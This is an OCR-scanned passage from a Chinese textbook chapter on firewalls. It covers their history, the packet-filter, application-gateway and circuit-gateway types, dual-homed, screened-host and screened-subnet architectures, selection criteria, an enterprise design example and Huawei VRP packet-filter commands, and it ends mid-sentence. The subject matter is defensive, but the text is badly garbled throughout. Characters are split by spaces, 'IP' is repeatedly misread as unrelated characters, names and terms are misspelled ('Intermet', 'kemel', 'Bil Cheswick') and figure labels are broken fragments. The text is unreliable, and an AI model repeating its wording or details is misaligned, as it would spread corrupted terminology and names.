到 1988 年 ，DEC 公司 的 Jeff Mogul 根据 自己 的 研究 ， 才 发 表 了 第 一 篇 描述 有 关 包 过 滤 防 


在 1989 一 1990 年 前 后 ，AT&T 贝尔 实验 室 的 Dave Presotto 和 Howard Trickey 率先 提 
出 了 基于 电路 中 继 的 第 二 代 防 火 墙 结构 ， 此 类 防火 墙 被 称 为 电路 级 网 关 防火 墙 。 但 是 ， 他 


们 既 没有 发 表 描述 这 一 结构 的 任何 文章 ， 也 没有 发 布 基于 这 一 结构 的 任何 产品 。 


第 三 代 防 火 墙 结构 是 在 20 世纪 80 年 代 末 和 20 世纪 90 年 代 初 由 Purdue University 和 
Gene Spafford，AT&T 贝尔 实验 室 的 Bil Cheswick 和 Marcus Ranum 分 别 研究 和 开发 的 。 
这 一 代 防 火 墙 被 称 为 应 用 级 网 关 防 火 墙 。 在 1991 年 ，Ranum 的 文章 引起 了 人 们 的 广泛 关 
注 。 此 类 防火 墙 采用 了 在 堡垒 主机 运行 代理 服务 的 结构 。 根 据 这 一 研究 成 果 ，DEC 公司 推 


出 了 第 一 个 商用 产品 SEAL。 


大 约 在 1991 年 ，Bill Cheswick 和 Steve Bellovin 开始 了 对 动态 包 过 滤 防 火 墙 的 研究 。 
1992 年 ， 在 USC 信息 科学 学 院 工作 的 Bob Braden 和 Annette DeSchon 开始 研究 用 于 Visas 
系统 的 动态 包 过 滤 防 火 墙 , 后 来 它 演变 为 目前 的 状态 检测 防火 墙 。1994 年 , 以 色 列 的 Check 


Point Software 公司 推出 了 基于 第 四 代 结 构 的 第 一 个 商用 产品 。 


关于 第 五 代 防 火 墙 ， 目 前 尚未 有 统一 的 说 法 ， 关 键 在 于 目前 还 没有 出 现 获 得 广泛 认可 
的 新 技术 。 一 种 观点 认为 ， 在 1996 年 由 Global Interet Software Group 公司 的 首席 科学 家 
Scott Wiegel 开始 启动 的 内 核 代 理 结 构 (kemel proxy architecture ) 研究 计划 属于 第 五 代 防 火 
墙 ， 还 有 一 种 观点 认为 ， 在 1998 年 由 NAI 公司 推出 的 自 适应 代理 (adaptive proxy) 技术 


给 代理 类 型 的 防火 墙 赋予 了 全 新 的 意义 ， 可 以 称 之 为 第 五 代 防火 墙 。 
10.3.2 ”防火 墙 的 分 类 


根据 防火 墙 在 网 络 协议 栈 中 的 过 滤 层 次 不 同 ， 通 常 把 防火 墙 分 为 三 种 : 包 过 滤 路 由 器 


防火 墙 、 应 用 级 网 关 防 火 墙 和 电路 级 网 关 防 火 墙 ， 如 图 10-4 所 示 。 
1. 包 过 滤 路 由 器 


包 过 滤 路 由 器 按照 设 定 的 一 组 规则 对 每 个 出 入 的 下 包 实 施 检查 , 然后 决定 转发 或 抛弃 
这 个 包 。 一 般 的 路 由 器 被 配置 为 对 输入 和 输出 到 互联 网 的 包 进行 双向 过 滤 ， 过 滤 规 则 由 含 


在 卫 包 中 的 以 下 信息 来 决定 。 
(1) 信 源 卫 地 址 : 发 送 耳 包 的 系统 的 源 耳 地 址 。 
(2) 信和 窒 下 地 址 : 人 P 包 所 要 到 达 的 目的 主机 的 下 地 址 。 


(3) 信 源 和 信 宿 的 传输 层 地 址 : 传输 层 TCP、UDP 或 SCTP 的 端口 号 ， 它 定义 了 诸如 


简单 网 络 管理 协议 SNMP， 远 程 登录 Telnet 等 服务 和 进程 。 


(4) 全 包 内 的 协议 字段 : 它 是 卫 头 部 的 一 个 字段 ， 定 义 了 耳 包 携 带 的 传输 层 协议 是 


TCP、UDP 或 SCTP 等 。 


(5) 网 络 接口 ， 对 于 有 三 个 或 更 多 的 网 络 接口 的 路 由 器 ， 防 火 墙 定义 了 从 哪个 接口 输 


入 的 数据 包 应 当 从 哪个 接口 转发 出 去 。 
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包 过 滤 规 则 的 实施 一 般 是 将 人 P 包 中 的 各 字段 或 TCP 头 部 的 字段 与 防火 墙 设 定 的 一 
数据 进行 匹配 。 如 果 这 些 规则 中 有 一 项 得 到 匹配 吻合 , 就 启用 决策 是 否 将 此 包 转 发 或 丢弃 。 
如 果 包 中 没有 任何 条 目 与 这 些 规则 匹配 ， 就 采取 一 种 默认 设置 的 行动 。 


外 网 了 
“加 
互联 网 六 
(a) 包 过 滤 路 由 器 
Telnet 
外。 | 
SMTP 
外 部 主机 HTTP 内 部 主机 


(b) 应 用 级 网 关 


& 一 一 一 一 一 一 一 一 = |Out In 内 部 主机 
外 部 连接 OutN 
外 部 主机 


部 主 Out 和 


(c) 电路 级 网 关 
图 10-4 防火墙 类 型 


2. 应 用 级 网 关 

应 用 级 网 关 也 称 为 代理 服务 器 ， 它 的 作用 就 像 一 个 应 用 层 数据 流 的 中 继 器 ， 用 户 使 用 
一 个 TCP/IP 的 应 用 连接 网 关 ， 如 Telnet 和 FTP 等 ， 网 关 让 用 户 告知 需要 访问 的 远 端 主机 
的 名 字 。 当 用 户 做 出 响应 ， 提 供 一 个 有 效 的 用 户 ID 以 及 认证 信息 ， 网 关 就 连接 远 端 主机 
的 应 用 , 在 这 两 个 终端 之 间 中 继 转 发 包含 应 用 数据 的 TCP 包 。 如 果 网 关 没有 被 安装 和 运行 
特定 应 用 的 代理 服务 软件 ， 它 就 不 支持 这 种 应 用 ， 不 能 将 数据 转发 过 防火 墙 。 另 外 ， 网 络 
管理 员 可 以 将 防火 墙 配置 为 只 支持 一 种 应 用 的 特定 功能 ， 而 拒绝 所 有 其 他 功能 。 

应 用 层 网 关 比 包 过 滤器 更 安全 。 En 
由 此 判断 它们 是 否 放行 或 禁止 。 应 用 层 网 关 只 需 明 确 设立 儿 种 允许 的 应 用 即 可 。 另 外 ，” 
很 方便 在 应 用 层 上 对 所 有 进入 内 网 的 数据 流 进行 日 志和 审计 。 

应 用 层 网 关 的 一 个 主要 缺点 是 对 每 个 连接 都 要 有 额外 的 处 理工 作 量 ， 产 生 一 定 的 延 
时 。 事 实 上 ， 在 两 个 终端 用 户 之 间 有 两 个 分 离 的 连接 ， 网 关 处 于 分 离 点 上 ， 网 关 必 须 在 两 
个 方向 上 检查 和 转发 所 有 的 数据 流 。 

3. 电路 级 网 关 

电路 级 网 关 可 以 是 一 个 独立 的 系统 或 者 是 在 一 个 应 用 层 网 关中 为 了 一 个 特定 的 应 用 
所 执行 的 一 个 特定 功能 。 电 路 层 网 关连 接 于 可 信任 系统 与 不 可 信任 系统 之 间 ， 当 对 位 于 两 
个 网 络 的 终端 进行 了 身份 认证 后 ， 对 它们 之 间 的 TCP 包 (或 UDP 包 ) 进行 中 继 转 发 。 电 
路 层 网 关 不 允许 终端 到 终端 的 TCP 连接 ， 而 是 由 此 网 关 建 立 起 两 个 TCP 连接 ， 一 个 是 它 
自己 与 内 网 的 一 个 TCP 主机 的 连接 ， 另 一 个 是 它 自 己 与 外 网 的 一 个 TCP 用 户 的 连接 。 一 
旦 建立 了 这 两 个 连接 ， 网 关 从 一 个 TCP 连接 将 TCP 数据 段 直 接 转发 到 另 一 个 连接 而 不 检 


查 其 中 高 层 的 内 容 ， 即 电路 层 网 关 不 接触 应 用 层 的 信息 ， 因 此 它 不 需要 像 代 理 服务 器 那样 
理 每 个 应 用 的 转换 。 


痉 


10.4 防火墙 体 系 结构 


防火 墙 的 目的 在 于 实现 安全 访问 控制 ， 因 此 按照 OSI 模型 的 安全 要 求 ， 防 火 墙 可 以 在 
OSI 七 层 中 的 第 5 层 设置 。 防 火 墙 从 功能 上 分 ， 通 常 由 几 个 部 分 组 成 ， 如 图 10-5 所 示 。 

目前 ， 防 火 墙 的 体系 结构 一 般 有 以 下 几 种 : 

(1) 双重 宿主 主机 体系 结构 ; 

(2) 屏蔽 主机 体系 结构 ; 

(3) 屏蔽 子 网 体系 结构 。 


10.4.1 双重 宿主 主机 体系 结构 


双重 宿主 主机 体系 结构 是 围绕 具有 双重 宿主 的 主机 而 构筑 的 ， 该 计算 机 至 少 有 两 个 网 
络 接口 。 这 样 的 主机 可 以 充当 与 这 些 接口 相连 的 网 络 之 间 的 路 由 器 ; 它 能 够 从 一 个 网 络 往 
另 一 个 网 络 发 送 IP 数据 包 。 然 而 , 实现 双重 宿主 主机 的 防火 墙 体系 结构 禁止 这 种 发 送 功能 。 
因而 ， 卫 数据 包 从 一 个 网 络 〈 例 如 互联 网 ) 并 不 是 直接 发 送 到 其 他 网 络 〈 例 如 内 部 的 、 被 
保护 的 网 络 )。 防火 墙 内 部 的 系统 能 与 双重 宿主 主机 通信 , 同时 防火 墙 外 部 的 系统 能 与 双重 
宿主 主机 通信 ， 但 是 这 种 系统 不 能 直接 互相 通信 ， 它 们 之 间 的 下 通信 被 完全 阻止 。 

双重 宿主 主机 的 防火 墙 体系 结构 是 相当 简单 的 ， 双 重 宿主 主机 位 于 两 者 之 间 ， 并 且 被 
连接 到 外 部 网 络 和 内 部 的 网 络 ， 图 10-6 显示 了 这 种 体系 结构 。 


人 机 接口 
访问 控制 策略 | 审计 | 安全 管理 | 数据 加 密 


De 内 部 主机 ”工作 站 工作 站 工作 站 
图 10-5 ”防火墙 组 成 结构 图 图 10-6 “双重 宿主 主机 体系 结构 


10.4.2 ”和 恒 蔽 主机 体系 结构 


双重 宿主 主机 体系 结构 是 由 一 台 同 时 连接 在 内 外 部 网 络 的 双重 宿主 主机 提供 安全 保 
障 的 ， 而 屏蔽 主机 体系 结构 则 不 同 ， 在 屏蔽 主机 体系 结构 中 ， 提 供 安全 保护 的 主机 仅仅 与 
被 保护 的 内 部 网 络 相连 。 屏 项 主机 体系 结构 还 使 用 一 个 单独 的 过 滤 路 由 器 来 提供 主要 安全 
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保护 ， 其 结构 如 图 10-7 所 示 。 


图 10-7 ”屏蔽 主机 体系 结构 


在 图 10-7 中 ,堡垒 主机 位 于 内 部 的 网 络 上 ,是 外 部 网 络 上 的 主机 连接 到 内 部 网 络 上 的 
系统 的 桥梁 。 即 使 这 样 ， 也 仅 有 某 些 确定 类 型 的 连接 被 允许 ， 任 何 外 部 的 系统 试图 访问 内 
部 的 系统 或 者 服务 都 必须 连接 到 这 台 堡垒 主机 上 。 因 此 , 堡垒 主机 需要 拥有 高 等 级 的 安全 。 
数据 包 过 滤 也 允许 堡垒 主机 开放 可 允许 的 连接 到 外 部 网 络 。 

在 该 结构 的 路 由 器 中 数据 包 过 滤 配 置 可 以 按 下 列 方法 执行 。 

(1) 允许 其 他 的 内 部 主机 为 了 某 些 服务 与 外 部 网 上 的 主机 连接 〈 即 允许 那些 已 经 由 数 
据 包 过 滤 的 服务 )。 

(2) 不 允许 来 自 内 部 主机 的 所 有 连接 。 用 户 可 以 针对 不 同 的 服务 混合 使 用 这 些 手段 。 
某 些 服务 可 以 被 允许 直接 经 由 数据 包 过 滤 ， 而 其 他 服务 仅仅 可 以 被 允许 间接 地 经 过 代理 。 
这 完全 取决 于 用 户 实行 的 安全 策略 。 

因为 这 种 体系 结构 允许 数据 包 从 外 部 网 向 内 部 网 的 移动 ， 所 以 ， 它 的 设计 比 没有 外 部 
数据 包 能 到 达 内 部 网 络 的 双重 宿主 主机 体系 结构 似乎 更 冒 风险 。 但 实际 上 ， 双 重 宿主 主机 
体系 结构 在 防备 数据 包 从 外 部 网 络 穿 过 内 部 的 网 络 时 ， 也 容易 产生 失败 〈 如 黑客 侵袭 )。 另 
外 ， 保 护 路 由 器 比 保护 主机 较 易 实现 ， 因 为 它 提供 非常 有 限 的 服务 组 。 多 数 情况 下 ， 被 屏 
蔽 的 主机 体系 结构 提供 比 双重 宿 主 主 机 体系 结构 更 好 的 安全 性 和 可 用 性 。 


10.4.3 屏蔽 子 网 体系 结构 


屏 蔽 子 网 体系 结构 添加 额外 的 安全 层 到 屏蔽 主机 体系 结构 ， 即 通过 添加 周边 网 络 更 进 
一 步 地 把 内 部 网 络 与 Intermet 隔离 开 。 

堡垒 主机 是 用 户 的 网 络 上 最 容易 被 攻击 的 计算 机 。 任 赁 用 户 尽 最 大 的 力气 去 保护 它 ， 
它 仍 是 最 有 可 能 被 入 侵 的 计算 机 ， 因 为 它 的 本 质 决定 了 它 最 容易 被 入 侵 。 在 屏蔽 主机 体系 
结构 中 ， 堡 垒 主机 一 旦 被 攻破 ， 那 么 被 保护 的 内 部 网 络 就 会 在 外 部 入 侵 者 面前 门户 洞开 ， 
在 堡 侄 主机 与 内 部 网 络 的 其 他 内 部 计算 机 之 间 没有 其 他 的 防御 手段 。 如 果 有 人 成 功 地 入 侵 


屏蔽 主机 体系 结构 中 的 堡垒 主机 ， 那 就 等 于 进入 了 内 部 系统 。 

通过 用 周边 网 络 隔离 堡垒 主机 ， 能 减少 堡 公主 机 被 入 侵 造成 的 影响 。 可 以 说 ， 它 只 给 
入 侵 者 一 些 访问 的 机 会 ， 但 不 是 全 部 。 屏 项 子 网 体系 结构 的 最 简单 的 形式 为 两 个 屏蔽 路 
器， 每 一 个 都 连接 到 周边 网 。 一 个 位 于 周边 网 与 保护 的 内 部 网 络 之 间 ， 男 一 个 位 于 周边 网 
与 外 部 网 络 之 间 ， 其 结构 如 图 10-8 所 示 。 


外 部 网 络 


图 10-8 ”屏蔽 子 网 体系 结构 


为 了 入 侵 用 屏蔽 子 网 体系 结构 保护 的 内 部 网 络 ， 入 侵 者 必须 要 通过 两 个 路 由 器 。 即 使 
入 侵 者 设法 入 侵 堡垒 主机 ， 他 将 仍然 必须 通过 内 部 路 由 器 。 

下 面 介 绍 在 这 种 结构 里 所 采用 的 组 件 。 

1. 周边 网 络 

周边 网 络 是 另 一 个 安全 层 ， 是 在 外 部 网 络 与 用 户 的 被 保护 的 内 部 网 络 之 间 附 加 的 网 
络 。 如 果 入 侵 者 成 功 地 入 侵 用 户 的 防火 墙 的 外 层 领域 ， 周 边 网 络 在 那个 入 侵 者 与 用 户 的 内 
部 系统 之 间 提 供 一 个 附加 的 保护 层 。 

2. 堡垒 主机 

在 屏蔽 子 网 体系 结构 中 ， 用 户 把 堡垒 主机 连接 到 周边 网 ， 这 台 主 机 便 是 接受 来 自 外 界 
连接 的 主要 入 口 。 它 为 内 部 网 络 服务 的 功能 如 下 。 

(1) 接收 外 来 的 电子 邮件 ， 再 分 发 给 相应 的 站 点 。 

(2) 接收 外 来 的 FTP 连接 ， 再 转 接 到 内 部 网 的 匿名 FTP 服务 器 。 

(3) 接收 外 来 的 对 有 关内 部 网 站 点 的 域名 服务 查询 。 

另 一 方面 ， 这 台 堡 圣 主 机 向 外 的 服务 功能 按 以 下 方法 实施 。 

(1) 在 外 部 和 内 部 的 路 由 器 上 设置 数据 包 过 滤 来 允许 内 部 的 客户 端 直接 访问 外 部 的 服 
务 器 。 

(2) 设置 代理 服务 器 在 堡垒 主机 上 运行 ， 允 许 内 部 网 的 用 户 间 接地 访问 外 部 网 的 服务 
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器 。 也 可 以 设置 数据 包 过 滤 ， 允 许 内 部 网 的 用 户 与 煲 凶 主机 上 的 代理 服务 器 进行 交互 ， 但 
是 禁止 内 部 网 的 用 户 直 接 与 外 部 网 进行 通信 。 

3. 内 部 路 由 器 

内 部 路 由 器 《阻塞 路 由 器 ) 保护 内 部 的 网 络 使 之 免 受 外 部 网 和 周边 网 的 侵犯。 

内 部 路 由 器 完成 防火 墙 的 大 部 分 数据 包 过 滤 工 作 。 它 允许 从 内 部 网 到 外 部 网 的 有 选择 
的 外 连 服务 。 这 些 服务 是 根据 内 部 网 络 的 需要 和 安全 规则 选 定 的 ， 如 Telnet、FTP 等 。 

内 部 路 由 器 可 以 设 定 ， 使 周边 网 上 的 堡垒 主机 与 内 部 网 之 间 传 递 的 各 种 服务 不 同 于 内 
部 网 和 外 部 网 之 间 传 递 的 各 种 服务 。 限 制 堡垒 主机 和 内 部 网 之 间 服 务 的 理由 是 减少 在 堡 驳 
主机 被 入 侵 后 而 受到 侵 秦 的 内 部 网 主机 的 数量 。 

4. 外 部 路 由 器 

在 理论 上 ， 外 部 路 由 器 (访问 路 由 器 ) 保护 周边 网 和 内 部 网 使 之 免 受 来 自 外 部 网 络 的 

入 侵 。 实 际 上 ， 外 部 路 由 器 倾向 于 几乎 让 所 有 周边 网 的 外 出 请 求 通过 ， 通 常 只 执行 非常 少 
的 数据 包 过 滤 。 保 护 内 部 计算 机 的 数据 包 过 滤 规 则 在 内 部 路 由 器 和 外 部 路 由 器 上 基本 是 一 
样 的 ， 如 果 在 规则 中 有 人 允许 入 侵 者 访问 的 错误 ， 错 误 就 可 能 出 现在 两 个 路 由 器 上 。 
由 于 外 部 路 由 器 一 般 由 外 界 提供 ， 例 如 用 户 的 互联 网 服务 提供 商 ISP， 所 以 用 户 对 外 
部 路 由 器 的 访问 是 受 限 制 的 。ISP 可 能 愿意 放 入 一 些 通用 型 数据 包 过 滤 规 则 来 维护 路 由 器 ， 
但 是 不 愿意 使 用 维护 复杂 或 者 频繁 变化 的 过 滤 规 则 。 因 此 ， 对 于 安全 保障 而 言 ， 不 能 像 依 
靠 内 部 路 由 器 那样 依靠 外 部 路 由 器 。 

外 部 路 由 器 能 有 效 地 执行 的 安全 任务 是 : 阻 断 从 外 部 网 络 上 伪造 源 地 址 进来 的 任何 数 
据 包 。 这 样 的 数据 包 自 称 来 自 内 部 网 络 ， 但 实际 上 是 来 自 外 部 网 络 。 


10.4.4 ”防火墙 体 系 结构 的 组 合 形式 


建造 防火 墙 时 ， 一 般 很 少 采用 单一 的 技术 ， 通 常 是 多 种 解决 不 同 问题 的 技术 的 组 合 。 
这 种 组 合 主要 取决 于 网 管 中 心 提供 什么 样 的 服务 ， 以 及 网 管 中 心 能 接受 什么 等 级 的 风险 。 
采用 哪 种 技术 主要 取决 于 经 费 、 投 资 的 大 小 或 技术 人 员 的 技术 、 时 间 等 因素 。 一 般 有 以 下 
一 些 形式 ， 
。 使 用 多 堡垒 主机 ; 
合并 内 部 路 由 器 与 外 部 路 由 器 ; 
。 合并 堡垒 主机 与 外 部 路 由 器 ; 
。 合并 堡垒 主机 与 内 部 路 由 器 ; 
。 使 用 多 台 内 部 路 由 器 ; 
。 使 用 多 台 外 部 路 由 器 ; 
。 使 用 多 个 周边 网 络 ; 
。 使 用 双重 宿主 主机 与 屏蔽 子 网 。 


10.5 防火墙 选 择 原 则 


我 们 在 规划 网 络 时 ， 不 能 不 考虑 整体 网 络 的 安全 性 。 而 谈 到 网 络 安全 ， 就 不 能 忽略 
防火 墙 的 功能 ， 防 火 墙 产品 往往 有 上 千 种 ， 如 何在 其 中 选择 最 符合 需要 的 产品 ， 是 消费 者 


眶 


最 关心 的 事 。 
(1) 一 个 好 的 防火 墙 应 该 是 一 个 整体 网 络 的 保护 者 。 


一 个 好 的 防火 墙 应 该 以 整体 网 络 保护 者 自居 ， 它 所 保护 的 对 象 应 该 是 全 部 的 Intermet， 


并 不 仅 是 那些 通过 防火 墙 的 使 用 者 。 
(2) 一 个 好 的 防火 墙 必须 能 弥补 其 他 操作 系统 的 不 足 。 


一 个 好 的 防火 墙 必须 是 建立 在 操作 之 间 而 不 是 在 操作 系统 之 后 ， 所 以 操作 系统 有 些 漏 
洞 并 不 会 影响 到 一 个 好 的 防火 墙 系统 所 提供 的 安全 性 。 由 于 硬件 平台 的 普及 以 及 执行 效率 
的 因素 ， 大 部 分 企业 经 常 把 对 外 提供 各 种 服务 的 服务 器 分 散在 许多 操作 平台 上 ， 我 们 在 无 
法 保证 所 有 主机 安全 的 情况 下 ， 选 择 防火 墙 作为 整体 安全 的 保护 者 。 这 正 说 明了 操作 系统 
提供 B 级 或 是 C 级 的 安全 并 不 一 定 会 直接 对 整体 安全 造成 影响 , 因为 一 个 好 的 防火 墙 必须 


能 弥补 操作 系统 的 不 足 。 
(3) 一 个 好 的 防火 墙 应 该 为 使 用 者 提供 不 同 平台 的 选择 。 


由 于 防火 墙 并 非 完全 由 硬件 构成 ， 因 此 软件 〈 操 作 系统 ) 所 提供 的 功能 以 及 执行 效率 
一 定 会 影响 到 整体 的 表现 ， 而 使 用 者 的 操作 意愿 及 对 防火 墙 软件 的 熟悉 程度 也 是 必须 考虑 
的 重点 。 一 个 好 的 防火 墙 不 但 本 身 要 有 良好 的 执行 效率 ， 也 应 该 提供 多 平台 的 执行 方式 供 
使 用 者 选择 ， 毕 况 使 用 者 才 是 完全 的 控制 者 。 使 用 者 应 该 选择 一 套 符 合 现在 环境 需求 的 软 


件 ， 而 并 非 为 了 软件 的 限制 而 改变 现 有 环境 。 
(4) 一 个 好 的 防火 墙 能 向 使 用 者 提供 完善 的 售后 服务 。 


由 于 有 新 的 产品 的 出 现 ， 就 会 有 人 研究 新 的 破解 方法 ， 因 此 一 个 好 的 防火 墙 提供 者 必 
须 有 一 个 庞大 的 组 织 作为 使 用 者 的 安全 后 盾 ， 也 应 该 有 众多 的 使 用 者 所 建立 的 口碑 为 防火 
墙 见证 。 防 火 墙 安装 和 投入 使 用 后 ， 并 非 万 事 大吉 ， 要 想 充分 发 挥 它 的 安全 防护 作用 ， 必 
须 对 它 进 行 跟踪 和 维护 ， 要 与 商家 保持 密切 的 联系 ， 时 刻 注视 商家 的 动态 。 因 为 商家 一 旦 
发 现 其 产品 存在 安全 漏洞 ， 那 么 会 尽快 发 布 补救 产品 ， 此 时 应 尽快 确认 真 伪 《〈 防 止 特 洛 伊 


木马 等 病毒 )， 并 对 防火 墙 软件 进行 更 新 。 
(5) 一 个 好 的 防火 墙 应 该 提供 完整 的 安全 检查 功能 。 


好 的 防火 墙 应 该 向 使 用 者 提供 完整 的 安全 检查 功能 ， 但 是 一 个 安全 的 网 络 仍 必 须 依靠 


使 用 者 的 观察 及 改进 。 
(6) 一 个 好 的 防火 墙 应 该 能 实现 中 转换 。 


卫 转换 能 隐藏 内 部 网 络 真正 的 下， 使 入 侵 者 无 法 直接 入 侵 内 部 网 ， 另 外 节省 的 下 作 


为 内 部 使 用 。 
(7) 一 个 好 的 防火 墙 应 该 有 双重 DNS。 


当 内 部 网 络 使 用 没有 注册 的 下 地 址 或 是 防火 墙 进行 瑟 转换 时 , DNS 也 必须 经 过 转换 ， 
同样 一 个 主机 在 内 部 的 卫 与 给 予 外 界 的 下 将 会 不 同 ， 所 以 双重 DNS 防火 墙 是 很 必要 的 。 


(8) 一 个 好 的 防火 墙 应 该 具有 查 杀 的 功能 。 


大 部 分 防火 墙 都 可 以 与 防 病毒 防火 墙 搭配 实现 查 杀 病 毒 功 能 ， 有 的 防火 墙 则 可 以 直接 


集成 扫 毒 功能 和 杀毒 功能 。 
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10.6 ” 某 企 业 销 售 系统 中 防火 墙 建 立 实例 


1. 企业 需求 分 析 
假设 某 企业 下 设 有 人 事 部 、 生 产 部 、 计 划 部 、 市 场 部 、 采 购 部 。 
2. 防火 墙 系统 设计 方案 

(1) 方式 一 (如 图 10-9 所 示 )。 


Web 


民 务 器 


防火 墙 


人 事 部 


生产 音 


计划 部 


市 场 部 


和 授权 来 管理 保护 。 


(2) 方案 二 (如 图 10-10 所 示 )。 


图 10-9 防火 墙 系统 实例 方案 一 


该 系统 由 于 Web 服务 器 在 防火 墙 之 外 ， 可 以 满足 企业 建立 主页 以 宣传 企业 的 形象 、 企 
业内 部 信息 交流 和 保护 内 部 网 络 安全 等 基本 要 求 ， 因 此 对 于 内 部 数据 安全 要 求 不 高 的 小 型 
企业 ， 此 方案 是 合适 的 。 

但 是 ， 一 旦 黑客 攻破 了 防火 墙 ， 整 个 内 部 网 络 就 处 在 完全 暴露 状态 。 而 且 ， 在 外 地 的 
销售 人 员 或 市 场 分 部 与 本 部 的 联系 易 造成 安全 漏洞 ， 内 部 的 敏感 数据 只 有 依靠 口令 、 加 密 


防火 墙 
Web 服务 器 
终端 访问 服务 器 
人 事 部 生产 部 计划 部 市 场 部 采购 部 
图 10-10 防火 墙 系统 实例 方案 二 


Web 服务 器 放 在 防火 墙 之 内 ， 有 利于 企业 对 Web 服务 器 上 企业 主页 进行 管理 和 维护 。 
而 且 ， 外 部 用 户 访问 它 ， 必 须 通 过 防火 墙 ， 可 防止 大 量 的 非法 入 侵 ， 如 果 外 部 用 户 访问 内 


部 网 络 ， 还 需 再 经 过 访问 服务 器 的 过 滤 ， 进 一 步 加 强 了 安全 性 。 而 且 内 部 用 户 访问 Internet 
会 受到 限制 ， 例 如 只 允许 E-mail 通过 。 
(3) 方案 三 (如 图 10-11 所 示 )。 


图 10-11 防火 墙 系统 实例 方案 三 


在 前 面 的 方案 中 ， 都 没有 考虑 企业 内 部 数据 的 保护 问题 。 实 际 上 ， 各 个 部 门 之 间 有 些 
数据 是 相互 公开 的 ， 而 有 些 数据 只 能 提供 本 部 门 或 部 门 内 的 少数 人 使 用 ， 例 如 采购 部 的 数 
据 。 这 样 ， 为 了 防止 来 自 内 部 的 攻击 ， 需 要 对 内 部 网 络 使 用 防火 墙 隔离 ， 这 样 就 可 以 构建 
比较 完整 的 防火 墙 安全 系统 。 


10.7 常用 防火 墙 的 配置 


下 面 介 绍 华为 的 VRP3 防火 墙 配 置 方 法 ,通用 路 由 平台 (Versatile Router Platform, VRP) 
是 华为 公司 数据 通信 产品 的 通用 网 络 操作 系统 平台 。 它 实现 了 OSPF、BGP、RIP、EIGRP 
等 多 种 单 播 和 多 播 路 由 协议 , 支持 路 由 迭代 、 路 由 策略 和 路 由 聚合 等 丰富 的 路 由 特性 , VRP 
中 的 防火 墙 主要 是 指 基于 访问 控制 列表 (ACL) 的 包 过 滤 、 基 于 应 用 层 的 包 过 滤 防 火 墙 
ASPF 和 地 址 转换 。 


10.7.1 ACL/ 包 过 滤 防 火 墙 配置 


ACL/ 包 过 滤 应 用 在 路 由 器 中 ， 为 路 由 器 增加 了 对 数据 包 的 过 滤 功 能 。ACL/ 包 过 滤 实 
现 对 IP 数据 包 的 过 滤 ， 对 路 由 器 需要 转发 的 数据 包 ， 先 获取 数据 包 的 包头 信息 ， 包 括 卫 
层 所 承载 的 上 层 协议 的 协议 号 ， 数 据 包 的 源 地址 、 目 的 地 址 、 源 端口 和 目的 端口 等 ， 然 后 
和 设 定 的 ACL 规则 进行 比较 ， 根 据 比较 的 结果 决定 对 数据 包 进 行 转发 或 者 丢弃 。ACL/ 包 
过 滤 提 供 了 对 分 片 报 文 检测 过 滤 的 支持 。 包 过 滤 防 火 墙 将 检测 报 文 类 型 《有 非 分 片 报 文 、 
首 片 分 片 报 文 和 非 首 片 分 片 报 文 )， 获 得 报 文 的 三 层 ( 卫 层 ) 信息 (基本 ACL 规则 和 不 含 
三 层 以 外 信息 的 高 级 ACL 规则 ) 及 三 层 以 外 的 信息 (包含 三 层 以 外 信息 的 高 级 ACL 规则 ) 
用 于 匹配 ， 并 获得 配置 的 ACL 规则 。 对 于 配置 了 精确 匹配 过 滤 方 式 的 高 级 ACL 规则 ， 包 
过 滤 防 火 墙 需要 记录 每 一 个 首 片 分 片 的 三 层 以 外 的 信息 ， 当 后 续 分 片 到 达 时 ， 使 用 这 些 保 
存 的 信息 对 ACL 规则 的 每 一 个 匹配 条 件 进行 精确 匹配 。 应 用 精确 匹配 过 滤 后 , 包 过 滤 防 火 
墙 的 执行 效率 会 略微 降低 ， 配 置 的 匹配 项 目 越 多 ， 效 率 降低 越 多 ， 可 以 配置 门限 值 为 限制 
防火 墙 最 大 处 理 的 数目 。 


历 允 碍 到 天 
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ACL/ 包 过 滤 防 火 墙 配置 主要 需要 的 配置 步骤 如 下 。 
(1) 人 允许 或 禁止 防火 墙 。 在 系统 视图 输入 操作 命令 : 


firewall enable 


如 果 是 禁止 防火 墙 ， 输 入 undo firewall enable。 系 统 默认 情况 下 禁止 防火 墙 。 
(2) 设置 防火 墙 默认 过 滤 方 式 。 在 系统 视图 输入 操作 命令 : 


firewall default permit 


如 果 设 置 默认 过 滤 方 式 为 禁止 通过 ， 输 入 firewall default deny。 在 防火 墙 开启 时 ， 系 
统 默认 人 允许 。 
(3) 设置 包 过 滤 防 火 墙 分 片 报 文 检测 开关 。 在 系统 视图 中 输入 操作 命令 : 


firewall fragments-inspect 


如 果 需 要 关闭 分 片 报 文 检测 开关 ， 输 入 undo firewall fragments-inspect。 注 意 ， 只 有 打 
开 了 分 片 报 文 检测 开关 ， 精 确 匹 配 模式 才能 真正 有 效 。 
(4) 配置 分 片 报 文 检测 的 上 、 下 门限 值 ， 在 系统 视图 输入 操作 命令 : 


firewall fragments-inspect {high | low} {default | number} 


如 果 恢 复 上 限 分 片 状态 记录 数目 为 默认 值 ， 输 入 undo firewall fragments-inspect {high | 
low}。 注 意 : 默认 的 上 限 分 片 状 态 记录 数目 为 2000， 下 限 分 片 状态 记录 数目 为 1500。 

(5) 在 接口 上 应 用 访问 控制 列表 ， 在 接口 视图 输入 操作 命令 : 

firewall packet-filter { acl-number | acl-name}{inbound | outbound} 

[match-fragments {normally | exactly}] 


如 果 取 消 接口 上 过 滤 接收 报 文 的 规则 ， 输 入 undo firewall packet-filter{acl-number | 
acl-name} {inbound | outbound} 

(6) 包 过 滤 防 火 墙 显 示 与 调试 。 

在 完成 上 述 配置 后 , 在 所 有 视图 下 执行 如 下 display 命令 可 以 显示 包 过 滤 防 火 墙 的 运行 
情况 ， 通 过 查看 显示 信息 验证 配置 的 效果 。 执 行 如 下 debugging 命令 可 以 对 包 过 滤 防 火 墙 
进行 调试 。 


display firewall-statistics {all | interface interface-name | fragments-— 


inspect} 

# 显 示 接 口 的 有 关 防 火 墙 的 统计 信息 

debugging firewall { all | icmp | tcp | udp | others} [interface interface- 
name] 

# 打 开 防 火 墙 包 过 滤 调 试 信息 开关 

undo debugging firewall { all | icmp| tcp | udp | others} [interface interface 


-name] 


## 关 闭 防 火 墙 包 过 滤 调 试 信息 开关 
10.7.2 ”防火墙 配置 实例 
下 面 通 过 一 个 公司 配置 防火 墙 的 实例 来 说 明 防火 墙 的 配置 。 


该 公司 通过 一 台 Quidway 路 由 器 的 接口 Serial1/0/0 访问 Intemet, 路 由 器 与 内 部 网 通过 
